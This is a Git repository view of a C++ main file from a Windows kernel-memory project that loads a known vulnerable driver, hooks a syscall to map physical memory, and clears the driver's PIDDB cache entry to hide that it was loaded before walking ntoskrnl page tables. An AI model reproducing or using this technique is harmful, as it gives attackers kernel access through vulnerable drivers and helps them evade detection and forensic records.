You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
PTM/nasa-tables/main.cpp

43 lines
1.7 KiB

4 years ago
#include <iostream>
#include "kernel_ctx/kernel_ctx.h"
#include "mem_ctx/mem_ctx.hpp"
int __cdecl main(int argc, char** argv)
4 years ago
{
if (!nasa::load_drv())
{
std::printf("[!] unable to load vulnerable driver... run as admin?\n");
return -1;
}
4 years ago
nasa::kernel_ctx kernel;
std::printf("[+] %s mapped physical page -> 0x%p\n", nasa::syscall_hook.first.data(), nasa::psyscall_func.load());
std::printf("[+] %s page offset -> 0x%x\n", nasa::syscall_hook.first.data(), nasa::nt_page_offset);
// clear piddb cache table entry for vulnerable driver...
if (kernel.clear_piddb_cache(nasa::drv_key, util::get_file_header((void*)raw_driver)->TimeDateStamp))
std::printf("[+] Removed PIDDB Cache entry for physmeme driver...\n");
else
std::printf("[!] unable to clear PIDDB Cache entry for vulnerable driver...\n");
if (!nasa::unload_drv())
{
std::printf("[!] unable to unload vulnerable driver... close all handles?\n");
return -1;
}
const std::pair<unsigned, virt_addr_t> my_proc_data = { GetCurrentProcessId(),
virt_addr_t{ reinterpret_cast<void*>(util::get_kernel_module_base("ntoskrnl.exe")) } };
4 years ago
std::cout << "[+] my pid: " << std::hex << my_proc_data.first << std::endl;
std::cout << "[+] kernel base: " << std::showbase << std::hex << my_proc_data.second.value << std::endl;
4 years ago
nasa::mem_ctx my_proc(kernel, my_proc_data.first);
const auto ntoskrnl_pde = my_proc.get_pde(my_proc_data.second.value);
// ntoskrnl is allocated in 2mb large pages :)
std::printf("[+] page present -> %d\n", ntoskrnl_pde.second.present);
std::printf("[+] page frame number -> 0x%x\n", ntoskrnl_pde.second.pfn);
std::printf("[+] large page -> %d\n", ntoskrnl_pde.second.page_size);
4 years ago
std::cin.get();
}